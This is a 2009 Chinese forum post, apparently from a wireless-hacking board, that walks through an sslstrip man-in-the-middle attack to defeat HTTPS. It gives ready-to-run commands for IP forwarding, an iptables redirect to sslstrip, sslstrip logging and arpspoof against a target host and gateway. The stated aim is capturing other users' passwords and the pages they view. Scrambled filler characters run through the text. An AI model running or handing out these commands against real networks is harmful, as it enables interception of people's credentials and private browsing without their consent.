少校
- 注册时间
- 2008-7-29
- 金币
- 623 个
- 威望
- 86 个
- 荣誉
- 25 个
尚未签到
|
无线渗透--从外网到内网系列之中间人攻击外传--拿下HTTPS.3 q1 A" d% u0 v9 D b. L1 N
* a* P" ?8 b, n0 l. j* o
强烈建议不明OpenSSL, MITM attack为何物的朋友,先看无线渗透--从外网到内网系列之中间人攻击(http://forum.anywlan.com/thread-17045-1-1.html),对MITM attack有了一定了解后在读本文. :) 正如杨哲在文中提到进行中间人攻击可以使得攻击者更有效地截获内网用户的密码及隐秘信息。在BackTrack环境下使用EtterCap or ArpSpoof工具即可. 但Ettercap支持的协议中, 在大部份情况下对仅HTTP、FTP、Telnet、SMTP等以明文传输的协议有效. 对HTTPS这样用了最新OpenSSL版本的就没办法了..... 直到刚在US举行的black hat 2009会上,一老黑发布的名为sslstrip的software,变像的解决了此问题.9 t) [: K* C2 L: R7 B" B( m
- W8 K) W* n% r+ k9 q% I! z
此软件可在(http://www.thoughtcrime.org/software/sslstrip/index.html)找到. E文ok的朋友还可以看他在Black hat上的精彩演讲. 因sslstrip是用python写成,不用安装也可运行.7 Y) n2 o7 ]/ h( X
" C( Q8 f2 w+ D& |3 b n用法分为以下几步:# @: r. \1 K d2 f' }5 ^
7 i3 f2 Z8 p9 p; b& M" V
1) 用命令 echo "1" > /proc/sys/net/ipv4/ip_forward 将你的机子进入forwarding mode.
9 A. ^9 m4 k$ m$ z( E; j% }( `% w: C
$ }- S& B- {5 N8 \6 }* F& [: _$ R2) 用命令 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 使iptables把所有http数据导入sslstrip.; Y/ K+ J. a4 V9 T* V
0 }" M3 F7 w) l% W9 |- A( V- _
3) 运行 sslstrip -a -w ssllog (写入文本)' N$ `& @& |8 I# T* z/ u
+ Q ]0 V% S; U& ]2 e3 C9 v" U4) 运行 arpspoof -i eth0 -t 192.168.1.15 (目标) 192.168.1.1 (网关)6 b2 y/ B& f+ k' V l: y$ i8 e
, d2 ~1 |5 u% b0 _3 N* G接下来就耐心等待吧! ;) 要提下的是生成的log文件如ssllog其实是html格式的.用konquer可以打开,这样连目标在看的网页面也一清二楚了. 以上均在自个的LAN和BT3下测试完成. 此文是小弟头一回发贴,有不对之处还请大狭们都指正! :)
* G3 y/ J0 v9 Y9 O
. L$ V+ s6 ~* RPrisoner |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
x
评分
-
1
查看全部评分
-
|
IP卡
狗仔卡
发表于 2009-2-28 14:06
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
发表于 2009-3-5 14:18
